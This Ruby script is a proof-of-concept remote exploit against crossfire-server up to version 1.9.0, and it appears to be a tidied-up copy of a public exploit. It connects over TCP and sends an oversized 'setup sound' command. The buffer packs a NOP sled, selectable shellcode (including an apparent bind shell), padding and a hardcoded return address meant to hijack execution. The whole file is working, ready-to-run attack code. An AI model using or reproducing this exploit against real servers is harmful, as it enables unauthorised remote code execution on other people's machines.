#!/usr/bin/env ruby
#
# == crossfire_setupsound_exploit.rb
#
# A PoC remote exploit against Crossfire game
#
# == Usage
#
# crossfire_setupsound_exploit.rb [options] crossfire-host[:port]
#
# == Description
#
# Yet another buffer overflow exploit against crossfire-server.
# Works for crossfire-server <= 1.9.0 (SetUp()).
#
# == Author
#
# Jerry Wozniak <jerry@pstree.org>
#
# == Version
#
# 0.1
#
# == Created
#
# 2013-10-15
#
require 'optparse'
require 'socket'
require_relative 'lib/l32shellcode'
class CrossfireClient
  # Minimal line-oriented TCP client for talking to a crossfire-server.
  #
  # @param host [String] server hostname or address
  # @param port [String, Integer] server port (passed straight to TCPSocket)
  def initialize(host, port)
    @host = host
    @port = port
  end

  # Opens the connection and reads the first line the server sends.
  #
  # @param verbose [Boolean] echo the banner line to stdout
  # @return [nil]
  def connect(verbose=false)
    @tcp = TCPSocket.new(@host, @port)
    @banner = @tcp.gets
    puts(@banner) if verbose
  end

  # Sends one CRLF-terminated line and reads one line back.
  #
  # @param command [String] raw bytes to send; "\r\n" is appended
  # @param verbose [Boolean] echo the command and the reply to stdout
  # @return [nil]
  def command(command, verbose=false)
    puts(command) if verbose
    wire = "#{command}\r\n"
    @tcp.write(wire)
    reply = @tcp.gets
    puts(reply) if verbose
  end
end
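class Payload
  include L32shellcode

  # Assembles the buffer sent in the "setup sound" command.
  #
  # The defaults are the values recorded by the original author; they are
  # kept as the method defaults rather than as globals.
  #
  # @param beforepad [String] filler placed after the shellcode
  # @param ret [String] 4-byte value placed after beforepad (the author's
  #   comment records it as a "jmp eax" in the crossfire binary)
  # @param nopsled [String] NOP bytes placed in front of the shellcode
  # @param afterpad [String] trailing filler bytes
  def initialize(beforepad = "\x41" * 4063,
                 # crossfire - 8071e4e jmp eax
                 ret = "\x4e\x1e\x07\x08",
                 nopsled = "\x90" * 200,
                 afterpad = "\x42" * 7)
    # Instance state instead of the original $beforepad/$ret/$nopsled/$afterpad
    # globals, which were process-wide and overwritten by every Payload.new.
    @beforepad = beforepad
    @ret = ret
    @nopsled = nopsled
    @afterpad = afterpad
  end

  # Looks up the shellcode named TYPE under L32shellcode and returns either
  # the bare bytes (PATTERN/SIMPLE, case-insensitive) or the bytes wrapped
  # in nopsled, padding and return value.
  #
  # @param type [String] name of an L32shellcode entry (see --shellcode)
  # @param len [Integer] unused; kept so existing callers keep working
  # @return [String]
  # @raise [ArgumentError] if TYPE is not a plain identifier
  def return(type, len=5000)
    # TYPE comes from the command line. The original evaluated it as Ruby
    # source unconditionally; an L32shellcode entry may be a constant or a
    # method (cannot tell from this file), so eval is kept but the input is
    # restricted to a single identifier first so it cannot carry code.
    unless type.to_s.match?(/\A[A-Za-z_]\w*\z/)
      raise ArgumentError, "invalid shellcode type: #{type.inspect}"
    end
    shellcode = eval("L32shellcode::#{type}")
    return shellcode if %w[PATTERN SIMPLE].include?(type.upcase)

    @nopsled + shellcode + @beforepad + @ret + @afterpad
  end
end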
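# Command-line driver: parse options, connect, send one "setup sound" line.
options = { shellcode: 'pattern' }
op = OptionParser.new do |opt|
  opt.banner = "Usage: #{File.basename($0)} [options] crossfire-host[:port]"
  opt.separator("\nWhere available options:")
  opt.on("-s", "--shellcode TYPE", "Shellcode to inject
Where TYPE can be:
simple
pattern
BIND") { |o| options[:shellcode] = o }
  opt.on("-v", "--verbose", "Verbose output") { options[:verbose] = true }
  opt.on("-h", "--help", "Show this help") { puts opt; exit 1 }
end
op.parse!
# The original tested ARGV.empty? while building the parser, before parse!
# had consumed the switches, so "-v" alone slipped through and popped nil as
# the host. Checking after parse! covers both cases.
if ARGV.empty?
  puts op
  exit 1
end
host, port = ARGV.pop.to_s.split(/:/)
# No ":port" suffix -> default crossfire port.
port ||= 13327
cf = CrossfireClient.new(host, port)
cf.connect(options[:verbose])
begin
  puts '[*] Deliverying the payload...'
  cf.command("\x11(setup sound " + Payload.new.return(options[:shellcode]) + "\x90\x00#", true)
rescue StandardError => e
  # StandardError still covers the socket/IO errors this path can raise;
  # the original `rescue Exception` also swallowed Interrupt and SystemExit.
  p e
  puts '[!!] No response'
end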